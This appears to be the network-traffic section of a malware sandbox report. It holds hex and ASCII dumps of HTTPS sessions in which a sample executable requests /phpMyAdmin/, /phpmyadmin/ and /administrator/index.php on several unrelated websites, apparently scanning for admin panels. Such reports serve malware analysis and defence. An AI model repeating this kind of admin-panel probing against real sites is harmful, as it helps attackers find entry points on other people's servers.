                                                                                                                                                                                                    2023-11-26 05:59:38 UTC13491INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 64 65 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 48 41 4b 20 48 4c 57 20 4c 61 6e 64 65 63 6b 2c 20 57 65 62 73 69 74 65 20 64 65 72 20 48 61 6e 64 65 6c 73 61 6b 61 64 65 6d 69 65 2c 20 64 65 72 20 4d 65 64 69 61 68 61 6b 20 4c 61 6e 64 65 63 6b 20 75 6e 64
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="de-de" dir="ltr"><head> <meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="HAK HLW Landeck, Website der Handelsakademie, der Mediahak Landeck und


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    208192.168.2.46002118.229.0.1714436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC158OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: rech.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC184INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 68 2e 63 6f 6d 2f 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Sun, 26 Nov 2023 05:59:38 GMTContent-Type: text/htmlContent-Length: 162Connection: closeLocation: https://www.rech.com/
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    209192.168.2.460288104.26.12.2454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC176OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: hightideinc.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC745INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 76 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingexpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, ma
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC624INData Raw: 37 63 62 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c
                                                                                                                                                                                                    Data Ascii: 7cb5<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://hightideinc.com/xmlrpc.php" /><script type="text/javascript">document.documentElement.cl
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1369INData Raw: 22 22 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 62 6f 64 79 22 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 7d 3b 22 63 6f 6d 70 6c 65 74 65 22 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 3f 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 62 29 3a 77 69 6e 64 6f 77 2e 61 74 74 61 63 68 45 76 65 6e 74 26 26 77 69 6e 64 6f 77 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 62 29 3a 62 28 29 7d 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 22 65 74 2d 64 69 76 69 2d 75 73 65 72 66 6f 6e 74 73 22 3e 40 66 6f 6e 74
                                                                                                                                                                                                    Data Ascii: "");document.getElementsByTagName("body")[0].appendChild(a)};"complete"!==document.readyState?window.addEventListener?window.addEventListener("load",b):window.attachEvent&&window.attachEvent("onload",b):b()}();</script><style id="et-divi-userfonts">@font
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1369INData Raw: 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 48 69 67 68 20 54 69 64 65 20 49 6e 63 2e 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 69 67 68 74 69 64 65 69 6e 63 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 44 69 76 69 20 76 2e 34 2e 32 33 2e 31 22 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 77 70 2d
                                                                                                                                                                                                    Data Ascii: ttps://hightideinc.com/feed/" /><link rel="alternate" type="application/rss+xml" title="High Tide Inc. &raquo; Comments Feed" href="https://hightideinc.com/comments/feed/" /><meta content="Divi v.4.23.1" name="generator" /><link rel="stylesheet" id="wp-
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1369INData Raw: 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f
                                                                                                                                                                                                    Data Ascii: oter,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;fo
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1369INData Raw: 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 7b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 65 6d 70 6c 61 74 65 2d 70
                                                                                                                                                                                                    Data Ascii: -dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video{margin:0 0 1em}.wp-block-template-p
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1369INData Raw: 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 29 20 30 25 2c 72 67 62 28 30 2c 32 30 38 2c 31 33 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 32 2c 31 38 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a
                                                                                                                                                                                                    Data Ascii: gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red:
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1369INData Raw: 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 78 2d 6c 61 72 67 65 3a 20 34 32 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69
                                                                                                                                                                                                    Data Ascii: font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spaci
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1369INData Raw: 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75
                                                                                                                                                                                                    Data Ascii: .is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: au
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1369INData Raw: 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67
                                                                                                                                                                                                    Data Ascii: hite) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orang


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    210192.168.2.46005234.240.130.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC181OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.harasduberry.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC231INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 73 74 72 69 63 74 2d 74 72 61 6e 73 70 6f 72 74 2d 73 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 36 30 34 38 30 30 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingstrict-transport-security: max-age=604800Server: nginx
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16153INData Raw: 31 66 33 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 6a 69 6d 63 64 6e 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 20 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 6a 69 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e
                                                                                                                                                                                                    Data Ascii: 1f37<!DOCTYPE html><html lang="fr-FR"><head> <meta charset="utf-8"/> <link rel="dns-prefetch preconnect" href="https://u.jimcdn.com/" crossorigin="anonymous"/><link rel="dns-prefetch preconnect" href="https://assets.jimstatic.com/" crossorigin
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC16384INData Raw: 76 61 75 78 20 c3 a0 20 76 65 6e 64 72 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 0d 0a 31 66 66 32 0d 0a 20 69 64 3d 22 63 63 2d 6e 61 76 2d 76 69 65 77 2d 32 31 31 35 39 31 35 33 37 39 22 20 63 6c 61 73 73 3d 22 6a 6d 64 2d 6e 61 76 5f 5f 6c 69 73 74 2d 69 74 65 6d 2d 30 20 6a 2d 6e 61 76 2d 68 61 73 2d 63 68 69 6c 64 72 65 6e 22 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 66 6f 73 2d 70 72 61 74 69 71 75 65 73 2d 70 61 72 2d 72 61 63 65 2f 22 20 64 61 74 61 2d 6c 69 6e 6b 2d 74 69 74 6c 65 3d 22 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 22 3e 49 6e 66 6f 73 20 70 72 61 74 69 71 75 65 73 20 70 61 72 20 72 61 63 65 3c 2f 61 3e 3c 73 70 61 6e 20 64 61 74 61 2d 6e 61 76 69 2d 74 6f 67 67 6c 65 3d 22 63 63
                                                                                                                                                                                                    Data Ascii: vaux vendre</a></li></ul></li><li1ff2 id="cc-nav-view-2115915379" class="jmd-nav__list-item-0 j-nav-has-children"><a href="/infos-pratiques-par-race/" data-link-title="Infos pratiques par race">Infos pratiques par race</a><span data-navi-toggle="cc
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC7295INData Raw: 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 5c 6e 5c 6e 4c 65 73 20 63 6f 6f 6b 69 0d 0a 31 63 35 32 0d 0a 65 73 20 64 65 20 63 6f 6e 74 72 5c 75 30 30 66 34 6c 65 20 4a 69 6d 64 6f 20 70 65 72 6d 65 74 74 65 6e 74 20 61 75 20 76 69 73 69 74 65 75 72 20 64 75 20 73 69 74 65 20 64 27 61 75 74 6f 72 69 73 65 72 20 6c 65 73 20 73 65 72 76 69 63 65 73 5c 2f 63 6f 6f 6b 69 65 73 20 73 5c 75 30 30 65 39 6c 65 63 74 69 6f 6e 6e 5c 75 30 30 65 39 73 20 65 74 20 65 6e 72 65 67 69 73 74 72 65 6e 74 20 6c 65 75 72 73 20 70 72 5c 75 30 30 65 39 66 5c 75 30 30 65 39 72 65 6e 63 65 73 20 65 6e 20 6d 61 74 69 5c 75 30 30 65 38 72 65 20 64 65 20 63 6f 6f 6b 69 65 73 2e 5c 6e 5c 6e 50 72 65 73 74 61 74 61 69 72 65 20 3a 5c 6e 4a 69 6d 64 6f 20 47 6d 62 48 2c 20 53
                                                                                                                                                                                                    Data Ascii: ntr\u00f4le Jimdo\n\nLes cooki1c52es de contr\u00f4le Jimdo permettent au visiteur du site d'autoriser les services\/cookies s\u00e9lectionn\u00e9s et enregistrent leurs pr\u00e9f\u00e9rences en mati\u00e8re de cookies.\n\nPrestataire :\nJimdo GmbH, S


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    211192.168.2.459989199.34.228.1774436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:38 UTC1356OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: www.gatewaytoearlylearning.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: PublishedSiteSession=eyJpdiI6Imo1aVN2WVJmWnBrNnZqSXJrYXFoblE9PSIsInZhbHVlIjoidVNWYlV1bDRTdmFsRnQ0anV4Zy9kK3RTUXdEQVFwV1I5OXo1Z0hKUTBWbWxoeFNDUGEwM3F0d1Y2d29pZFZoZm5GQUloWURIUW1SRUo0aHQ5Ry8xTEhUejRwYndPNVlGSDdtbXZMUkxVbjcwNmxQTVpKSnV1dVZsQ3B5ajZnOTkiLCJtYWMiOiJjZWU3NTQ4MWIwNzUyNDE5MDQ3NWZjNGY3YjYwMWJiZjMwNzk4ZDZmOGU2ZjFhYTNkNzA5N2RkOTgwNzBlMmJiIiwidGFnIjoiIn0%3D; publishedsite-xsrf=eyJpdiI6InZhbDJwVnlLUWhubGJIVTRxS1RyS3c9PSIsInZhbHVlIjoibEtHV0dCVjhVZFFxdXVPckRoandqSmJIM2VpRWo3WkE2ejZGY2pQbU5MVDEyaUwxT3czZzd6T2tYUFc2WjNmYm83eGJpaCtkTnU2eW1zMmcxN3N5eHJlbjdPL1drOGwyOUw5TjhsM0k1MnBoWDhYOHJucU5VWGN6Z3lZOC9qejUiLCJtYWMiOiJkYmI0NTNiNTQ5YzNhYzUxNjUyMDM2MWNlM2QzYzYxNGMyZTJhMWY2MzYyYWNiN2JjNzQ2ODI5NzJlMjU2MGQ0IiwidGFnIjoiIn0%3D; XSRF-TOKEN=eyJpdiI6IkxXaFVUaFNtTzd2ZGkvek9mQ0hvQmc9PSIsInZhbHVlIjoiZmhtK2lrVUlvZjdVZHpFVWVmMjR6b0VFRVYwWWdxaXNkRmpTQ202R0hubjNUM2czRThCblFXTXNOVjhQNC9kdS8yMmhialBBNGtpcW05eDZ0NDJzMGFDZ2VUemRuU2dvU01pdUNUdGEwc0wvUFRqdUt3MFl6RFlkblFaTWhZQy8iLCJtYWMiOiI2ZTM3MmEwZmUyNWQ5ZDgyYTFhNWQwMDg4OWNkNTdlNmI5ZDJhZmM1MzcwMzM3NDgxZjBlNDI5MTllNTVlN2VjIiwidGFnIjoiIn0%3D
